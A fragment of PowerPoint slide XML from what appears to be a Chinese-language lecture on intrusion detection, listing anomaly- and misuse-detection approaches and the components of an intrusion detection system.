                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Multivariate Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>多个随机变量的相关性计算， </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>马尔可夫过程模型（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Markov Process Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>）：初始分布和概率转移矩阵；预测新的事件的出现频率太低，则表明出现异常情况。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>时序模型（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Time Series Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>）：该模型通过间隔计时器和资源计数器两种类型随机变量参数之间的相隔时间和它们的值来判断入侵</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="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Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19DBA87E-CF07-4CF9-A56B-9E62B3404EF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="1066800"/>
            <a:ext cx="510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
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>异常入侵检测方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142339" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79A26467-94E2-4F5C-9B77-8D697E194662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="1905000"/>
            <a:ext cx="62484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统计异常检测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基于特征选择异常检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRP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基于贝叶斯推理异常检测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基于贝叶斯网络异常检测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基于模式预测异常检测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基于神经网络异常检测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基于贝叶斯聚类异常检测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基于机器学习异常检测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基于数据挖掘异常检测</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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{074E16E3-E18B-4949-8575-E16E65CAB2D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="2057400"/>
            <a:ext cx="48768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基于条件概率误用检测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基于专家系统误用检测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基于状态迁移误用检测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基于键盘监控误用检测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>基于模型误用检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143363" name="Text Box 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB8F5255-7447-42E5-849D-C065644C6CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="1066800"/>
            <a:ext cx="510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
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>误用入侵检测方法</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260FAF00-CCC5-41FF-A508-25563FC1094F}"/>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FC5B08A2-9C0B-4F7D-B190-A350FFFB8D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="2017713"/>
            <a:ext cx="8704263" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>方法一：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户名、口令登录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="AutoShape 4" descr="安全警示牌注意安全设计元素素材免费下载(图片编号:9340003)-六图网">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CAA99B-60AF-4D33-8E3E-5ECB70B7C737}"/>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p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14341" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C49A16D-458A-49A7-B5DD-C746BEC6E9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413" y="3141663"/>
            <a:ext cx="4843462" cy="34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70A2C27C-A40B-4761-B4D0-AE99DE782E4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于误用的入侵检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144387" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365855C8-D62B-4A7D-9B15-A4E92C05F491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2209800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>思想：主要是通过某种方式预先定义入侵行为，然后监视系统，从中找出符合预先定义规则的入侵行为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>误用信号需要对入侵的特征、环境、次序以及完成入侵的事件相互间的关系进行描述</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>重要问题</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>）如何全面的描述攻击的特征</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>）如何排除干扰，减小误报</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>）解决问题的方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>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0" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{407E395C-8729-4373-8C55-9F04C406D905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="1066800"/>
            <a:ext cx="5105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
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>其它</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145411" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0FF9F55-1F9B-4D74-AFEB-7152E28B9395}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="2438400"/>
            <a:ext cx="4876800"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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>基于生物免疫检测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>基于伪装检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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46434" name="Group 2050">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91181CB2-7C00-4734-99F0-46F1EB09BD8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="609600"/>
            <a:ext cx="7696200" cy="5334000"/>
            <a:chOff x="480" y="384"/>
            <a:chExt cx="4848" cy="3360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146435" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D357E50-494E-4222-8761-36667C459350}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="864" y="576"/>
              <a:ext cx="4224" cy="31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46436" name="Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{764F4440-4E1D-4656-AC3B-5091D35C6640}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="480" y="384"/>
              <a:ext cx="4848" cy="33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46437" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85C4A4BE-8CFB-4313-BF9F-8D283002E830}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1600" y="802"/>
              <a:ext cx="643"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活动</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146438" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6090A5FF-B9AF-4F69-A0F0-3F9D75D61786}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="528" y="624"/>
              <a:ext cx="857" cy="267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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数据源</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146439" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8E316A2-A489-4841-9CAB-A5F795E8F0BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1171" y="1337"/>
              <a:ext cx="857" cy="268"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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感应器</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146440" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D95DF86D-C224-4AB5-AD4E-A3FE0BA81600}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2350" y="1961"/>
              <a:ext cx="857" cy="268"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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分析器</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146441" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B722468-D10C-434F-9684-2EF06652F981}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3743" y="2496"/>
              <a:ext cx="857" cy="267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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管理器</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146442" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA17A5B9-D676-4EBD-AD16-03CDD25CCB8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3529" y="624"/>
              <a:ext cx="1178" cy="267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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操作员</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146443" name="Line 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39F24109-F071-4C64-8354-BFADC19C820C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1385" y="802"/>
              <a:ext cx="32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4" name="Line 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85CDAAC2-07F4-4E87-AF34-D2683141BB3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1707" y="802"/>
              <a:ext cx="0" cy="53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5" name="Line 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9077031E-2E27-408E-B87A-5175160E2676}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2028" y="1515"/>
              <a:ext cx="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6" name="Line 14">
              <a:extLst>
